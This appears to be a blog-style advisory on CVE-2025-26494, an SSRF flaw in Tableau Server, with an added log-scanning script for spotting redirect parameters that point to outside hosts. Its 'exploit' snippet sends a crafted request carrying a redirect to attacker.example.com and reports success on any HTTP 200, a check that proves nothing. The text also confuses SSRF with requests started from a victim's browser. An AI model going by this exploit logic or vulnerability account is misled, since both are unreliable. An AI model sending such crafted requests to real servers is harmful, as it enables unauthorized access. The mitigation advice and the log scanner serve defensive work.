A critical Server-Side Request Forgery (SSRF) vulnerability has been discovered in Salesforce Tableau Server, identified as CVE-2025-26494. This vulnerability allows attackers to bypass authentication and potentially access sensitive information, perform unauthorized actions, or even execute arbitrary code on the affected systems. Tableau Server versions from 2023.3 through 2023.3.5 are affected by this vulnerability.

Original References

1. CVE-2025-26494 - The official detailed entry on the MITRE website.
2. Tableau Security Advisory - Official announcement from Salesforce Tableau detailing the affected versions and possible mitigations.

Vulnerability Details

The SSRF flaw allows attackers to craft malicious requests that are then sent to the Tableau Server. One possible attack vector involves initiating such a request from an unsuspecting victim's browser, which leads to the bypass of authentication and may expose sensitive data or enable the attacker to perform unauthorized actions.

Exploit

The following code snippet demonstrates how an attacker might exploit the SSRF vulnerability in the affected Tableau Server installations:

import requests

# Target Tableau Server (placeholder hostname) and the crafted path carrying
# the redirect parameter that the SSRF flaw follows.
target_url = "https://target-tableau-server.example.com"
forge_request = "/malicious/url?redirect=https://attacker.example.com"

victim_url = f"{target_url}{forge_request}"
# Send the crafted request; a timeout avoids hanging on an unresponsive host.
response = requests.get(victim_url, timeout=10)

# The snippet treats an HTTP 200 as a sign the crafted request was accepted.
if response.status_code == 200:
    print("SSRF vulnerability successfully exploited!")
else:
    print("Exploit failed. The target may not be vulnerable.")

In this example, the attacker sends a specially crafted request to the victim's Tableau Server, which can potentially be manipulated to bypass authentication and lead to sensitive data exposure or unauthorized actions.

Mitigation and Recommendations

Salesforce Tableau has addressed this issue in Tableau Server versions 2023.3.6 and later. System administrators managing affected Tableau Server installations should update to a fixed version as soon as possible to prevent exploitation of the vulnerability.

As an additional layer of security, administrators should also implement network segmentation, restrict access to sensitive data and applications, and regularly monitor logs for suspicious activity.
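The log monitoring recommended above, as an added example that is not part of the original page or of Tableau's own tooling: it scans constructed web-access-style log lines for query parameters carrying an absolute URL to a host outside an assumed allowlist, which is the pattern the redirect-based request in the snippet above relies on. The log layout, the allowlist and the sample lines are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical allowlist: hosts the Tableau Server is legitimately expected to redirect to.
ALLOWED_HOSTS = {"tableau.example.com", "sso.example.com"}

# Constructed sample lines in a combined-log-style layout (not real Tableau log output).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Feb/2025:18:20:01 +0000] "GET /views/Sales/Overview HTTP/1.1" 200 5120
10.0.0.5 - - [11/Feb/2025:18:20:07 +0000] "GET /login?redirect=https://tableau.example.com/views HTTP/1.1" 302 0
203.0.113.9 - - [11/Feb/2025:18:21:44 +0000] "GET /malicious/url?redirect=https://attacker.example.com HTTP/1.1" 200 812
203.0.113.9 - - [11/Feb/2025:18:21:50 +0000] "GET /api?url=http://203.0.113.7:8080/probe HTTP/1.1" 500 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def external_targets(path):
    """Return (param, host) pairs for query values that are absolute URLs to non-allowlisted hosts."""
    hits = []
    for param, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        for value in values:
            parts = urlsplit(value)
            # Relative paths have no scheme/host and are left alone; only absolute URLs are checked.
            if parts.scheme in ("http", "https") and parts.hostname and parts.hostname not in ALLOWED_HOSTS:
                hits.append((param, parts.hostname))
    return hits


def scan_log(text):
    """Return one finding per request whose query string points the server at an external host."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed layout
        hits = external_targets(m.group("path"))
        if hits:
            findings.append({"src": m.group("src"), "ts": m.group("ts"),
                             "status": int(m.group("status")), "targets": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} -> {f['targets']} (HTTP {f['status']})")
```

A hit with a 2xx status is the case worth triaging first, since the server accepted rather than rejected the crafted request.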

Conclusion

The CVE-2025-26494 SSRF vulnerability in Salesforce Tableau Server poses a significant risk to affected installations, as it may allow attackers to bypass authentication and access sensitive data or perform unauthorized actions. System administrators are urged to update their Tableau Server installations to a fixed version immediately and take additional precautions to ensure the security of their networks and data.

Timeline

Published on: 02/11/2025 18:15:47 UTC
Last modified on: 02/19/2025 22:15:24 UTC